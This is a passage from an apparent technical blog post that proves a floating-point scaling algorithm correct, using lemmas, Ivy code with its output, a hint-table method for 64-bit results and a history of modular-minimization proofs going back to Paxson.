<b>Lemma 10</b>. For <math><mrow><mi>p</mi><mo>∈</mo><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>400</mn><mo>,</mo><MO form='prefix'>−</MO><mn>28</mn><mo stretchy=false>]</mo><mo>∪</mo><mo stretchy=false>[</mo><mn>28</mn><mo>,</mo><mn>400</mn><mo stretchy=false>]</mo></mrow></math>, <math><mrow><mi>b</mi><mo>≤</mo><mn>64</mn></mrow></math>, and <math><mrow><mi>m</mi><mo>≥</mo><mn>73</mn></mrow></math>, <math><mrow><mtext>Scale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math> computes <math><mrow><mtext>uscale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math> and <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≠</mo><mn>1</mn></mrow></math>.
<p>
<i>Proof</i>. We calculated above that <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≥</mo><mn>2</mn></mrow></math>. By Lemma 4, <math><mrow><mtext>Scale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math> computes <math><mrow><mtext>uscale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math>. <math><mo>∎</mo></math>
</div>
<a class=anchor href="#bonus"><h2 id="bonus">Bonus: 64-bit Input, 64-bit Output?</h2></a>
<p>
We don’t need full 64-bit input and 64-bit output, but if we did,
there is a way to make it work at only a minor performance cost.
It turns out that for 64-bit input and 64-bit output,
for any given <math><mi>p</mi></math>, considering all the inputs <math><mi>x</mi></math> that cause <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>=</mo><mn>0</mn></mrow></math>,
either all the middles overflowed or none of them did.
So we can use a lookup table to decide how to interpret <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>=</mo><mn>0</mn></mrow></math>.
<p>
The implementation steps would be:
<ol>
<li>
Note that the proofs remain valid without <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≠</mo><mn>1</mn></mrow></math>.
<li>
Don’t make use of the <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≠</mo><mn>1</mn></mrow></math> optimization in the <code>uscale</code> implementation.
<li>
When <math><mi>p</mi></math> is large, force the sticky bit to 1
instead of trying to compute it from <math><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI></math>.
<li>
When <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>=</mo><mn>0</mn></mrow></math> for a large <math><mi>p</mi></math>, consult a table of hint bits
indexed by <math><mi>p</mi></math> to decide whether <math><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI></math> has overflowed.
If so, decrement <math><MI>𝑡𝑜𝑝</MI></math>.</ol>
<p>
Here is a proof that this works.
<p>
First, define <code>topdiff</code> which computes the difference between <math><MI>𝑡𝑜𝑝</MI></math> and <math><mrow><MI>𝑡𝑜𝑝</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup></mrow></math> for a given <math><mrow><mi>b</mi><mo>,</mo><mi>m</mi><mo>,</mo><mi>p</mi></mrow></math>.
<pre class='language-ivy'># topdiff computes top - topℝ.
op (b m p) topdiff x =
top = (x * pm p) >> b+m
topℝ = (floor x * (10**p) / 2**pe p) >> b+m
top - topℝ
</pre>
<p>
Next, define <code>hint</code>, which is like <code>check1</code>
in that it looks for counterexamples.
When it finds counterexamples, it computes <code>topdiff</code>
for each one and reports whether
they all match, and if so what their value is.
<pre class='language-ivy'># (b m) hint p returns (p pm x middle fail) where pm is (pm p).
# If there is a counterexample to p, x is the first one,
# middle is (x*pm)'s middle bits, and fail is 1, 2, or 3:
# 1 if all counterexamples have top = topR
# 2 if all counterexamples have have top = topR+1
# 3 if both kinds of counterexamples exist or other counterexamples exist
# If there is no counterexample, x middle fail are 0 0 0.
op (b m) hint p =
x = modmin (2**b-1) ((2**b)-1) (pm p) (2**b+m)
middle = ((x * pm p) mod 2**b+m) >> b
middle >= 1: p (pm p) x middle 0
all = modfindall (2**b-1) ((2**b)-1) (pm p) (2**b+m) 0 ((2**b)-1)
diffs = b m p topdiff@ all
equal = or/ diffs == 0
carry = or/ diffs == 1
other = ((count all) >= 100) or or/ (diffs != 0) and (diffs != 1)
p (pm p) x middle ((1*equal)|(2*carry)|(3*other))
</pre>
<p>
Finally, define <code>hints</code>, which is like <code>show check</code>.
It gets the hint results for all large <math><mi>p</mi></math> and
prints a summary of how many were in four categories:
no hints needed, all hints 0, all hints 1, mixed hints.
<pre class='language-ivy'>op hints (b m) =
table = mix b m hint@ (seq -400 -28), (seq 28 400)
(box 'b=', (text b), ' m=', (text m)), (+/ mix table[;4] ==@ iota 4)
</pre>
<p>
Now we can try <math><mrow><mi>b</mi><mo>=</mo><mn>64</mn><mo>,</mo><mi>m</mi><mo>=</mo><mn>64</mn></mrow></math>:
<pre class='language-ivy'>hints 64 64
-- out --
b=64 m=64 452 184 110 0
</pre>
<p>
The output says that 452 powers don’t need hints,
184 need a hint that <math><mrow><MI>𝑡𝑜𝑝</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>=</mo><MI>𝑡𝑜𝑝</MI></mrow></math>,
and 110 need a hint that <math><mrow><MI>𝑡𝑜𝑝</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>=</mo><MI>𝑡𝑜𝑝</MI><mo>−</mo><mn>1</mn></mrow></math>.
Crucially, 0 need conflicting hints,
so the hinted algorithm works for <math><mrow><mi>b</mi><mo>=</mo><mn>64</mn><mo>,</mo><mi>m</mi><mo>=</mo><mn>64</mn></mrow></math>.
<p>
Of course, that leaves 64 top bits, and since one bit is the ½ bit,
this is technically only a 63-bit result.
(If you only needed a truncated 64-bit result instead of a rounded one,
you could use <math><mrow><mi>e</mi><mo>−</mo><mn>1</mn></mrow></math> and
read the ½ bit as the final bit of truncated result.)
<p>
It turns out that hints are not enough to get a full 64 bits plus a ½ bit,
which would leave a 63-bit middle.
In that case, there turn out to be 63 powers where <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>=</mo><mn>0</mn></mrow></math> is ambiguous:
<pre class='language-ivy'>hints 64 63
-- out --
b=64 m=63 241 283 159 63
</pre>
<p>
However, if you only have 63 bits of input, then you can have the full 64-bit output:
<pre class='language-ivy'>hints 63 64
-- out --
b=63 m=64 601 86 59 0
</pre>
<a class=anchor href="#completed_proof"><h2 id="completed_proof">Completed Proof</h2></a>
<div class=lemma id=theorem1>
<p>
<b>Theorem 1</b>. For the cases used in the printing and parsing algorithms, namely <math><mrow><mi>p</mi><mo>∈</mo><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>400</mn><mo>,</mo><mn>400</mn><mo stretchy=false>]</mo></mrow></math> with (printing) <math><mrow><mi>b</mi><mo>≤</mo><mn>55</mn><mo>,</mo><mi>m</mi><mo>≥</mo><mn>66</mn></mrow></math> and (parsing) <math><mrow><mi>b</mi><mo>≤</mo><mn>64</mn><mo>,</mo><mi>m</mi><mo>≥</mo><mn>73</mn></mrow></math>, <math><mtext>Scale</mtext></math> is correct and <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≠</mo><mn>1</mn></mrow></math>.
<p>
<i>Proof</i>. We proved these five cases:
<ul>
<li>
<p>
<a href="#lemma3">Lemma 3</a>. For exact results, <math><mtext>Scale</mtext></math> computes <math><mrow><mtext>uscale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math> and <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≠</mo><mn>1</mn></mrow></math>.
<li>
<p>
<a href="#lemma7">Lemma 7</a>. For inexact results and <math><mrow><mi>p</mi><mo>∈</mo><mo stretchy=false>[</mo><mn>0</mn><mo>,</mo><mn>27</mn><mo stretchy=false>]</mo></mrow></math> and <math><mrow><mi>b</mi><mo>≤</mo><mn>64</mn></mrow></math>, <math><mrow><mtext>Scale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math> computes <math><mrow><mtext>uscale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math> and <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≠</mo><mn>1</mn></mrow></math>.
<li>
<p>
<a href="#lemma8">Lemma 8</a>. For inexact results, <math><mrow><mi>p</mi><mo>∈</mo><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>27</mn><mo>,</mo><MO form='prefix'>−</MO><mn>1</mn><mo stretchy=false>]</mo></mrow></math>, and <math><mrow><mi>b</mi><mo>≤</mo><mn>64</mn></mrow></math>, <math><mrow><mtext>Scale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math> computes <math><mrow><mtext>uscale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math> and <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≠</mo><mn>1</mn></mrow></math>.
<li>
<p>
<a href="#lemma9">Lemma 9</a>. For <math><mrow><mi>p</mi><mo>∈</mo><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>400</mn><mo>,</mo><MO form='prefix'>−</MO><mn>28</mn><mo stretchy=false>]</mo><mo>∪</mo><mo stretchy=false>[</mo><mn>28</mn><mo>,</mo><mn>400</mn><mo stretchy=false>]</mo></mrow></math>, <math><mrow><mi>b</mi><mo>≤</mo><mn>55</mn></mrow></math>, and <math><mrow><mi>m</mi><mo>≥</mo><mn>66</mn></mrow></math>, <math><mrow><mtext>Scale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math> computes <math><mrow><mtext>uscale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math> and <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≠</mo><mn>1</mn></mrow></math>.
<li>
<p>
<a href="#lemma10">Lemma 10</a>. For <math><mrow><mi>p</mi><mo>∈</mo><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>400</mn><mo>,</mo><MO form='prefix'>−</MO><mn>28</mn><mo stretchy=false>]</mo><mo>∪</mo><mo stretchy=false>[</mo><mn>28</mn><mo>,</mo><mn>400</mn><mo stretchy=false>]</mo></mrow></math>, <math><mrow><mi>b</mi><mo>≤</mo><mn>64</mn></mrow></math>, and <math><mrow><mi>m</mi><mo>≥</mo><mn>73</mn></mrow></math>, <math><mrow><mtext>Scale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math> computes <math><mrow><mtext>uscale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math> and <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≠</mo><mn>1</mn></mrow></math>.</ul>
<p>
The result follows directly from these. <math><mo>∎</mo></math>
</div>
<a class=anchor href="#simpler_proof"><h2 id="simpler_proof">A Simpler Proof</h2></a>
<p>
The proof we just finished is the most precise analysis we can do.
It enables tricks like the hint table for 64-bit input and 64-bit output.
However, for printing and parsing, we don’t need to be quite that precise.
We can reduce the four inexact cases to two
by analyzing the exact <math><mrow><MI>𝑝𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup></mrow></math> values instead of our
rounded <math><MI>𝑝𝑚</MI></math> values.
We will show that the spacing around the exact integer
results is wide enough that
all the non-exact integers can’t have middles near <math><mn>0</mn></math> or <math><mrow><mn>2</mn><msup><mspace height='0.66em' /><mi>m</mi></msup></mrow></math>.
The idea of proving a minimal spacing around the exact integer results
is due to Michel Hack,
although the proof is new.
<p>
Specifically, we can use the same machinery we just built to prove that
<math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>∈</mo><mo stretchy=false>[</mo><mn>2</mn><mo>,</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><mi>m</mi><MO lspace='0' rspace='0'>+</MO><mn>2</mn></mrow></msup><mo stretchy=false>]</mo></mrow></math> for
inexact results with <math><mrow><mi>p</mi><mo>∈</mo><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>400</mn><mo>,</mo><mn>400</mn><mo stretchy=false>]</mo></mrow></math>,
eliminating the need for <a href="#lemma7">Lemmas 7 and 8</a> by
generalizing <a href="#lemma9">Lemmas 9 and 10</a>.
To do that, we analyze the non-zero results
of <math><mrow><mi>x</mi><mo>·</mo><MI>𝑝𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><MO>mod</MO><mn>2</mn><msup><mspace height='0.66em' /><mrow><mi>b</mi><MO lspace='0' rspace='0'>+</MO><mi>m</mi></mrow></msup></mrow></math>.
(If that expression is zero, the result is exact,
and we are only analyzing the inexact case.)
<p>
Let’s start by defining <code>gcd</code> and <code>pmR</code>, which returns <code>pn pd</code>
such that <math><mrow><MI>𝑝𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>=</mo><MI>𝑝𝑛</MI><mn>/</mn><MI>𝑝𝑑</MI></mrow></math>.
<pre class='language-ivy'>op x gcd y =
not x*y: x+y
x > y: (x mod y) gcd y
x <= y: x gcd (y mod x)
(15 gcd 40) is 5
</pre>
<pre class='language-ivy'>op pmR p =
e = pe p
num = (10**(0 max p)) * (2**-(0 min e))
denom = (10**-(0 min p)) * (2**(0 max e))
num denom / num gcd denom
(pmR -5) is (2**139) (5**5)
</pre>
<p>
Let’s also define a helper <code>zlog</code> that is like <math><mrow><mrow><mtext>log</mtext><msub><mspace height='0em' /><mn>2</mn></msub><mspace width='0.166em' /></mrow><mn>|</mn><mi>x</mi><mn>|</mn></mrow></math>
except that <code>zlog 0</code> is 0.
<pre class='language-ivy'>op zlog x =
x == 0: 0
2 log abs x
(zlog 4) is 2
(zlog 0) is 0
</pre>
<p>
Now we can write an exact version of <code>check1</code>.
We want to analyze <math><mrow><mi>x</mi><mo>·</mo><MI>𝑝𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><MO>mod</MO><mn>2</mn><msup><mspace height='0.66em' /><mrow><mi>b</mi><MO lspace='0' rspace='0'>+</MO><mi>m</mi></mrow></msup></mrow></math>,
but to use integers, instead we analyze
<math><mrow><mi>x</mi><msub><mspace height='0em' /><mi>R</mi></msub><mo>=</mo><mi>x</mi><mo>·</mo><MI>𝑝𝑛</MI><MO>mod</MO><MI>𝑝𝑑</MI><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><mi>b</mi><MO lspace='0' rspace='0'>+</MO><mi>m</mi></mrow></msup></mrow></math>.
We find the <math><mrow><mi>x</mi><mo>∈</mo><mo stretchy=false>[</mo><MI>𝑥𝑚𝑖𝑛</MI><mo>,</mo><MI>𝑥𝑚𝑎𝑥</MI><mo stretchy=false>]</mo></mrow></math> with minimal <math><mrow><mi>x</mi><msub><mspace height='0em' /><mi>R</mi></msub><mo>></mo><mn>0</mn></mrow></math>
and the <math><mrow><mi>y</mi><mo>∈</mo><mo stretchy=false>[</mo><MI>𝑥𝑚𝑖𝑛</MI><mo>,</mo><MI>𝑥𝑚𝑎𝑥</MI><mo stretchy=false>]</mo></mrow></math> with maximal <math><mrow><mi>y</mi><msub><mspace height='0em' /><mi>R</mi></msub></mrow></math>.
Then we convert those to <math><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI></math> values by
dividing by <math><mrow><MI>𝑝𝑑</MI><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>b</mi></msup></mrow></math>.
<pre class='language-ivy'>op (b m) check1R p =
pn pd = pmR p
xmin = 2**b-1
xmax = (2**b)-1
M = pd * 2**b+m
x = modminge xmin xmax pn M 1
x < 0: p 0 0 0 0
y = modmax xmin xmax pn M
xmiddle ymiddle = float ((x y * pn) mod M) / pd * 2**b
p x y xmiddle ((xmiddle < 2) or (ymiddle > M-2))
op (b m) checkR ps = mix b m check1R@ ps
show1 64 64 check1 200
show1 64 64 check1R 200
-- out --
200 0xa738c6bebb12d16cb428f8ac016561dc 0xffe389b3cdb6c3d0 0x34 .
200 0xffe389b3cdb6c3d0 0x8064104249b3c03e 0x1.9c2145p+05 .
</pre>
<pre class='language-ivy'>op proveR (b m) =
table = bad b m checkR (seq -400 400)
what = 'b=', (text b), ' m=', (text m), ' t=', text ((127-1)-m),'+½'
(count table) == 0: print '✅ proved ' what
print '❌ disproved' what
print short show table
</pre>
<pre class='language-ivy'>proveR 55 66
proveR 55 62
proveR 64 73
proveR 64 72
-- out --
✅ proved b=55 m=66 t=60 + ½
❌ disproved b=55 m=62 t=64 + ½
167 0x7b6e56a6b7fd53 0x463bc17af3f48e 0x1.817b1cp-02 ❌
201 0x68224666341b59 0x588220995c452a 0x1.8e0a91p-02 ❌
211 0x69923a6ce74f07 0x597216983bdc1a 0x1.14fbd3p-03 ❌
221 0x404a552daaaeea 0x50ad765f4fd461 0x1.de3812p+00 ❌
✅ proved b=64 m=73 t=53 + ½
❌ disproved b=64 m=72 t=54 + ½
-93 0xf324bb0720dbe7fe 0xc743006eaf2d0e4f 0x1.3a8eb6p+00 ❌
</pre>
<p>
The failures that <code>proveR</code> finds mostly correspond to the failures
that <code>prove</code> found,
except that <code>proveR</code> is slightly more conservative: the reported failure
for <math><mrow><mi>p</mi><mo>=</mo><mn>221</mn></mrow></math> is a false positive.
<pre class='language-ivy'>prove 55 66
prove 55 62
prove 64 73
prove 64 72
-- out --
✅ proved b=55 m=66 t=61+½
❌ disproved b=55 m=62 t=65+½
167 0xd910f7ff28069da41b2ba1518094da05 0x7b6e56a6b7fd53 0x0 ❌
201 0xd106f86e69d785c7e13336d701beba53 0x68224666341b59 0x1 ❌
211 0xf356f7ebf83552fe0583f6b8c4124d44 0x69923a6ce74f07 0x0 ❌
✅ proved b=64 m=73 t=54+½
❌ disproved b=64 m=72 t=55+½
-93 0x857fcae62d8493a56f70a4400c562ddc 0xf324bb0720dbe7fe 0x1 ❌
</pre>
<div class=lemma id=lemma11>
<p>
<b>Lemma 11</b>. For <math><mrow><mi>p</mi><mo>∈</mo><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>400</mn><mo>,</mo><mn>400</mn><mo stretchy=false>]</mo></mrow></math>, <math><mrow><mi>b</mi><mo>≤</mo><mn>55</mn></mrow></math>, and <math><mrow><mi>m</mi><mo>≥</mo><mn>66</mn></mrow></math>, <math><mrow><mtext>Scale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math> computes <math><mrow><mtext>uscale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math> and <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≠</mo><mn>1</mn></mrow></math>.
<p>
<i>Proof</i>. Our Ivy code <code>proveR 55 66</code> confirmed that <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>∈</mo><mo stretchy=false>[</mo><mn>2</mn><mo>,</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>m</mi></msup><mo>−</mo><mn>2</mn><mo stretchy=false>]</mo></mrow></math>.
By <a href="#lemma5">Lemma 5</a> and <a href="#lemma6">Lemma 6</a>,
<math><mrow><mtext>Scale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math> computes <math><mrow><mtext>uscale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math> and <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≠</mo><mn>1</mn></mrow></math>. <math><mo>∎</mo></math>
</div>
<div class=lemma id=lemma12>
<p>
<b>Lemma 12</b>. For <math><mrow><mi>p</mi><mo>∈</mo><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>400</mn><mo>,</mo><mn>400</mn><mo stretchy=false>]</mo></mrow></math>, <math><mrow><mi>b</mi><mo>≤</mo><mn>64</mn></mrow></math>, and <math><mrow><mi>m</mi><mo>≥</mo><mn>73</mn></mrow></math>, <math><mrow><mtext>Scale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math> computes <math><mrow><mtext>uscale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math> and <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≠</mo><mn>1</mn></mrow></math>.
<p>
<i>Proof</i>. Our Ivy code <code>proveR 64 73</code> confirmed that <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>∈</mo><mo stretchy=false>[</mo><mn>2</mn><mo>,</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>m</mi></msup><mo>−</mo><mn>2</mn><mo stretchy=false>]</mo></mrow></math>.
By <a href="#lemma5">Lemma 5</a> and <a href="#lemma6">Lemma 6</a>,
<math><mrow><mtext>Scale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math> computes <math><mrow><mtext>uscale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math> and <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≠</mo><mn>1</mn></mrow></math>. <math><mo>∎</mo></math>
</div>
<div class=lemma id=theorem2>
<p>
<b>Theorem 2</b>. For the cases used in the printing and parsing algorithms, namely <math><mrow><mi>p</mi><mo>∈</mo><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>400</mn><mo>,</mo><mn>400</mn><mo stretchy=false>]</mo></mrow></math> with (printing) <math><mrow><mi>b</mi><mo>≤</mo><mn>55</mn><mo>,</mo><mi>m</mi><mo>≥</mo><mn>66</mn></mrow></math> and (parsing) <math><mrow><mi>b</mi><mo>≤</mo><mn>64</mn><mo>,</mo><mi>m</mi><mo>≥</mo><mn>73</mn></mrow></math>, <math><mtext>Scale</mtext></math> is correct and <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≠</mo><mn>1</mn></mrow></math>.
<p>
<i>Proof</i>. Follows from <a href="#lemma3">Lemma 3</a>, <a href="#lemma11">Lemma 11</a>, and <a href="#lemma12">Lemma 12</a>. <math><mo>∎</mo></math>
</div>
<a class=anchor href="#related_work"><h2 id="related_work">Related Work</h2></a>
<p>
Parts of this proof have been put together in different ways
for other purposes before, most notably to prove that
exact <i>truncated</i> scaling can be implemented using 128-bit mantissas
in floating-point parsing and printing algorithms.
This section traces the history of the ideas as best I have been able
to determine it.
In these summaries, I am using the terminology and
notation of this post—such as top, middle, bottom,
<math><mrow><mi>x</mi><msub><mspace height='0em' /><mi>R</mi></msub></mrow></math> and <math><mrow><MI>𝑝𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup></mrow></math>—for consistency and ease of understanding.
Those terms and notations do not appear in the actual related work.
<p>
This section is concerned with the proof methods in these papers
and only touches on the actual algorithms to the extent that they
are relevant to what was proved. The <a href="fp#related">main post’s related work</a>
discusses the algorithms in more detail.
<a class=anchor href="#paxson_1991"><h3 id="paxson_1991">Paxson 1991</h3></a>
<p>
→ Vern Paxson, “<a href="https://www.icir.org/vern/papers/testbase-report.pdf">A Program for Testing IEEE Decimal-Binary Conversion</a>”, class paper 1991.
<p>
The earliest work that I have found that linked modular minimization
to floating-point conversions
is Paxson’s 1991 paper, already mentioned above and
written for one of William Kahan’s graduate classes.
Paxson credits Tim Peters
for the modular minimization algorithms,
citing an email discussion on <code>validgh!numeric-interest@uunet.uu.net</code> in April 1991:<blockquote>
<p>
In the following section we derive a modular
equation which if minimized produces especially difficult conversion inputs; those
that lie as close as possible to exactly half way between two representable outputs.
We then develop the theoretical framework for demonstrating the correctness of
two algorithms developed by Tim Peters for solving such a modular minimization
problem in O(log(N)) time.</blockquote>
<p>
I have been unable to find copies of the <code>numeric-interest</code> email discussion.
<p>
Peters broke down the minimization problem into a two step process,
which I followed in this proof.
Using this post’s notation (<math><mrow><mi>x</mi><msub><mspace height='0em' /><mi>R</mi></msub><mo>=</mo><mi>x</mi><mo>·</mo><mi>c</mi><MO>mod</MO><mi>m</mi></mrow></math>),
the two steps in Paxson’s paper (with two algorithms each) are:
<ul>
<li>
<i>FirstModBelow</i>: Find the first <math><mrow><mi>x</mi><mo>≥</mo><mn>0</mn></mrow></math> with <math><mrow><mi>x</mi><msub><mspace height='0em' /><mi>R</mi></msub><mo>≤</mo><mtext><i>hi</i></mtext></mrow></math>. <br>
<i>FirstModAbove</i>: Find the first <math><mrow><mi>x</mi><mo>≥</mo><mn>0</mn></mrow></math> with <math><mrow><mi>x</mi><msub><mspace height='0em' /><mi>R</mi></msub><mo>≥</mo><MI>𝑙𝑜</MI></mrow></math>.
<li>
<i>ModMin</i>: Find the <math><mrow><mi>x</mi><mo>∈</mo><mo stretchy=false>[</mo><MI>𝑥𝑚𝑖𝑛</MI><mo>,</mo><MI>𝑥𝑚𝑎𝑥</MI><mo stretchy=false>]</mo></mrow></math> that maximizes <math><mrow><mi>x</mi><msub><mspace height='0em' /><mi>R</mi></msub><mo>≤</mo><mtext><i>hi</i></mtext></mrow></math>. <br>
<i>ModMax</i>: Find the <math><mrow><mi>x</mi><mo>∈</mo><mo stretchy=false>[</mo><MI>𝑥𝑚𝑖𝑛</MI><mo>,</mo><MI>𝑥𝑚𝑎𝑥</MI><mo stretchy=false>]</mo></mrow></math> that minimizes <math><mrow><mi>x</mi><msub><mspace height='0em' /><mi>R</mi></msub><mo>≥</mo><MI>𝑙𝑜</MI></mrow></math>.</ul>
<p>
(The names <i>ModMin</i> and <i>ModMax</i> seem inverted from their definitions,
but perhaps “Min” refers to finding something below a limit and “Max”
to finding something above a limit.
They are certainly inverted from this post’s usage.)
<p>
In contrast, this post’s algorithms are;
<ul>
<li>
<code>modfirst</code>: Find the first <math><mrow><mi>x</mi><mo>≥</mo><mn>0</mn></mrow></math> with <math><mrow><mi>x</mi><msub><mspace height='0em' /><mi>R</mi></msub><mo>∈</mo><mo stretchy=false>[</mo><MI>𝑙𝑜</MI><mo>,</mo><mtext><i>hi</i></mtext><mo stretchy=false>]</mo></mrow></math>.
<li>
<code>modfind</code>: Find the first <math><mrow><mi>x</mi><mo>∈</mo><mo stretchy=false>[</mo><MI>𝑥𝑚𝑖𝑛</MI><mo>,</mo><MI>𝑥𝑚𝑎𝑥</MI><mo stretchy=false>]</mo></mrow></math> with <math><mrow><mi>x</mi><msub><mspace height='0em' /><mi>R</mi></msub><mo>∈</mo><mo stretchy=false>[</mo><MI>𝑙𝑜</MI><mo>,</mo><mtext><i>hi</i></mtext><mo stretchy=false>]</mo></mrow></math>.
<li>
<code>modmin</code>: Find the <math><mrow><mi>x</mi><mo>∈</mo><mo stretchy=false>[</mo><MI>𝑥𝑚𝑖𝑛</MI><mo>,</mo><MI>𝑥𝑚𝑎𝑥</MI><mo stretchy=false>]</mo></mrow></math> that minimizes <math><mrow><mi>x</mi><msub><mspace height='0em' /><mi>R</mi></msub></mrow></math>.
<li>
<code>modminge</code>: Find the <math><mrow><mi>x</mi><mo>∈</mo><mo stretchy=false>[</mo><MI>𝑥𝑚𝑖𝑛</MI><mo>,</mo><MI>𝑥𝑚𝑎𝑥</MI><mo stretchy=false>]</mo></mrow></math> that minimizes <math><mrow><mi>x</mi><msub><mspace height='0em' /><mi>R</mi></msub><mo>≥</mo><MI>𝑙𝑜</MI></mrow></math>.
<li>
<code>modmax</code>: Find the <math><mrow><mi>x</mi><mo>∈</mo><mo stretchy=false>[</mo><MI>𝑥𝑚𝑖𝑛</MI><mo>,</mo><MI>𝑥𝑚𝑎𝑥</MI><mo stretchy=false>]</mo></mrow></math> that maximizes <math><mrow><mi>x</mi><msub><mspace height='0em' /><mi>R</mi></msub></mrow></math>.</ul>
<p>
It is possible to use <code>modfirst</code> to implement
Paxson’s <i>FirstModBelow</i> and <i>FirstModAbove</i>, and vice versa,
so they are equivalent in power.
<p>
In Paxson’s paper,
the implementation and correctness of <i>FirstModBelow</i> and <i>FirstModAbove</i>
